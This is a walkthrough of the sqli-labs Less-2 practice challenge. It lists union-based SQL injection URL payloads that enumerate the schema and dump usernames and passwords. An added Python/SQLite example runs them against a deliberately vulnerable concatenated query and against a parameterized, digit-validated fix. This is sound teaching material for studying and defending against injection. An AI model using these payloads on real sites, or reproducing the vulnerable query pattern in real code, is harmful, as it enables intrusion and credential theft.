Less-2 GET - Error based - Intiger based
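Integer-based injection does not require closing a single quote.
- Basically the same as Less-1, just without the single quote
- Find the column count: ?id=1 order by 3%23
- Find which column positions are displayed: ?id=0 union select 1,2,3%23
- Dump the database name: ?id=0 union select 1,2,database()%23 returns the database name: security
- Dump the tables: ?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23. The challenge asks for id, so the target should be users, the user data table
- Dump the columns: ?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' %23
- Dump the data: ?id=0 union select 1,2,group_concat(username,0x3a,password) from users%23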
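
Why no quote needs closing, and what fixes it, as an added example that is not from the original post or the sqli-labs source. It uses Python's sqlite3 with a constructed users table and assumes the lab concatenates id unquoted into the query; the function names are hypothetical, and the dump payload is adapted to SQLite syntax.

```python
import re
import sqlite3

def make_db():
    # Constructed sample rows standing in for the lab's users table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "pw-alice"), (2, "bob", "pw-bob")])
    return db

def lookup_vulnerable(db, raw_id):
    # Assumed query shape: id is concatenated into a numeric context with no
    # quotes, so there is nothing to close and the whole value is parsed as SQL.
    sql = "SELECT * FROM users WHERE id=" + raw_id + " LIMIT 0,1"
    return db.execute(sql).fetchall()

def lookup_hardened(db, raw_id):
    # Reject anything that is not a short run of ASCII digits, then bind the
    # value as a parameter so it can never be parsed as SQL text.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("id must be a decimal integer")
    return db.execute("SELECT * FROM users WHERE id=? LIMIT 0,1",
                      (int(raw_id),)).fetchall()

# The page's position probe, and its data dump adapted to SQLite syntax
# (|| instead of 0x3a; the trailing # comment is not needed here).
PROBE = "0 union select 1,2,3"
DUMP = "0 union select 1,2,group_concat(username || ':' || password) from users"

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "1"))
    print(lookup_vulnerable(db, PROBE))
    print(lookup_vulnerable(db, DUMP))
    for value in ("1", PROBE, DUMP):
        try:
            print(lookup_hardened(db, value))
        except ValueError as exc:
            print("rejected:", exc)
```

The bound parameter alone already stops the injection; the digit check adds an early, explicit rejection that is easy to log and alert on.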